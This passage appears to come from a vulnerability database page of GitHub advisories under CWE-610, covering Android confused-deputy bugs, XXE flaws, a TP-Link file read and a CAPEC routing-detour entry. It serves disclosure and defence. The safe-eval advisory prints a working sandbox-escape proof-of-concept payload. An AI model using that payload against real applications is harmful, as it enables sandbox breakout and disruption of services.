"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:M/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-WMRR-G68F-2FHJ
Vulnerability from github – Published: 2022-07-14 00:00 – Updated: 2022-07-27 00:00In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-223578534
{
"affected": [],
"aliases": [
"CVE-2022-20223"
],
"database_specific": {
"cwe_ids": [
"CWE-610"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-13T19:15:00Z",
"severity": "HIGH"
},
"details": "In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-223578534",
"id": "GHSA-wmrr-g68f-2fhj",
"modified": "2022-07-27T00:00:48Z",
"published": "2022-07-14T00:00:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20223"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2022-07-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WMW7-JPM9-RMFF
Vulnerability from github – Published: 2026-04-08 21:33 – Updated: 2026-05-07 18:30An external configuration control vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information.This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
{
"affected": [],
"aliases": [
"CVE-2026-30817"
],
"database_specific": {
"cwe_ids": [
"CWE-15",
"CWE-610"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-08T19:25:20Z",
"severity": "MODERATE"
},
"details": "An external configuration control vulnerability in the OpenVPN module\u00a0of TP-Link AX53 v1.0\u00a0allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information.This issue affects AX53 v1.0: before 1.7.1 Build 20260213.",
"id": "GHSA-wmw7-jpm9-rmff",
"modified": "2026-05-07T18:30:33Z",
"published": "2026-04-08T21:33:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30817"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2305"
},
{
"type": "WEB",
"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware"
},
{
"type": "WEB",
"url": "https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware"
},
{
"type": "WEB",
"url": "https://www.tp-link.com/us/support/faq/5055"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WVJ2-GC45-C4J5
Vulnerability from github – Published: 2022-03-31 00:00 – Updated: 2022-04-06 00:01In Gallery, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201535427
{
"affected": [],
"aliases": [
"CVE-2021-39765"
],
"database_specific": {
"cwe_ids": [
"CWE-610"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-30T16:15:00Z",
"severity": "MODERATE"
},
"details": "In Gallery, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201535427",
"id": "GHSA-wvj2-gc45-c4j5",
"modified": "2022-04-06T00:01:52Z",
"published": "2022-03-31T00:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39765"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/android-12l"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WW6V-677G-P656
Vulnerability from github – Published: 2018-07-18 18:28 – Updated: 2023-09-11 22:19Affected versions of safe-eval are vulnerable to a sandbox escape. By accessing object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.
Proof of Concept:
This code accesses the process object and calls .exit()
var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");
Recommendation
Update to version 0.4.0 or later
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "safe-eval"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-16088"
],
"database_specific": {
"cwe_ids": [
"CWE-610"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:01:17Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Affected versions of `safe-eval` are vulnerable to a sandbox escape. By accessing object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox. \n\n## Proof of Concept:\nThis code accesses the process object and calls `.exit()`\n```js\nvar safeEval = require(\u0027safe-eval\u0027);\nsafeEval(\"this.constructor.constructor(\u0027return process\u0027)().exit()\");\n```\n\n\n## Recommendation\n\nUpdate to version 0.4.0 or later",
"id": "GHSA-ww6v-677g-p656",
"modified": "2023-09-11T22:19:18Z",
"published": "2018-07-18T18:28:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16088"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/issues/5"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/issues/59"
},
{
"type": "WEB",
"url": "https://github.com/hacksparrow/safe-eval/pull/13"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-ww6v-677g-p656"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/337"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Sandbox Breakout in safe-eval"
}
GHSA-WXPC-F9FQ-W9PQ
Vulnerability from github – Published: 2026-02-07 06:31 – Updated: 2026-02-07 06:31A vulnerability was identified in O2OA up to 9.0.0. This impacts an unknown function of the file /x_program_center/jaxrs/mpweixin/check of the component HTTP POST Request Handler. The manipulation leads to xml external entity reference. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-2074"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-07T05:16:12Z",
"severity": "MODERATE"
},
"details": "A vulnerability was identified in O2OA up to 9.0.0. This impacts an unknown function of the file /x_program_center/jaxrs/mpweixin/check of the component HTTP POST Request Handler. The manipulation leads to xml external entity reference. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-wxpc-f9fq-w9pq",
"modified": "2026-02-07T06:31:05Z",
"published": "2026-02-07T06:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2074"
},
{
"type": "WEB",
"url": "https://github.com/SourByte05/SourByte-Lab/issues/7"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.344640"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.344640"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.745486"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.745489"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X2FM-RMW7-73V2
Vulnerability from github – Published: 2026-06-21 09:30 – Updated: 2026-06-21 09:30A vulnerability was determined in zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 1.0.0. This vulnerability affects unknown code of the file /adpweb/a/base/barcodeDetail/import of the component XML Parser. This manipulation causes xml external entity reference. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-12788"
],
"database_specific": {
"cwe_ids": [
"CWE-610"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-21T09:16:25Z",
"severity": "LOW"
},
"details": "A vulnerability was determined in zhilink \u667a\u4e92\u8054(\u6df1\u5733)\u79d1\u6280\u6709\u9650\u516c\u53f8 ADP Application Developer Platform \u5e94\u7528\u5f00\u53d1\u8005\u5e73\u53f0 1.0.0. This vulnerability affects unknown code of the file /adpweb/a/base/barcodeDetail/import of the component XML Parser. This manipulation causes xml external entity reference. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-x2fm-rmw7-73v2",
"modified": "2026-06-21T09:30:51Z",
"published": "2026-06-21T09:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12788"
},
{
"type": "WEB",
"url": "https://ucn9h68n9289.feishu.cn/docx/LeLOdhV6mo3clzxstxXcpFzbnjg?from=from_copylink"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-12788"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/835655"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/372530"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/372530/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X2GP-W3V9-22XP
Vulnerability from github – Published: 2025-04-04 12:30 – Updated: 2025-04-04 12:30A vulnerability, which was classified as problematic, was found in zhangyanbo2007 youkefu up to 4.2.0. This affects an unknown part of the file src/main/java/com/ukefu/webim/web/handler/admin/callcenter/CallCenterRouterController.java of the component XML Document Handler. The manipulation of the argument routercontent leads to xml external entity reference. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-3241"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-04T11:15:40Z",
"severity": "MODERATE"
},
"details": "A vulnerability, which was classified as problematic, was found in zhangyanbo2007 youkefu up to 4.2.0. This affects an unknown part of the file src/main/java/com/ukefu/webim/web/handler/admin/callcenter/CallCenterRouterController.java of the component XML Document Handler. The manipulation of the argument routercontent leads to xml external entity reference. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-x2gp-w3v9-22xp",
"modified": "2025-04-04T12:30:20Z",
"published": "2025-04-04T12:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3241"
},
{
"type": "WEB",
"url": "https://github.com/askqiu/cve/blob/main/README.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.303267"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.303267"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.547585"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-219: XML Routing Detour Attacks
An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.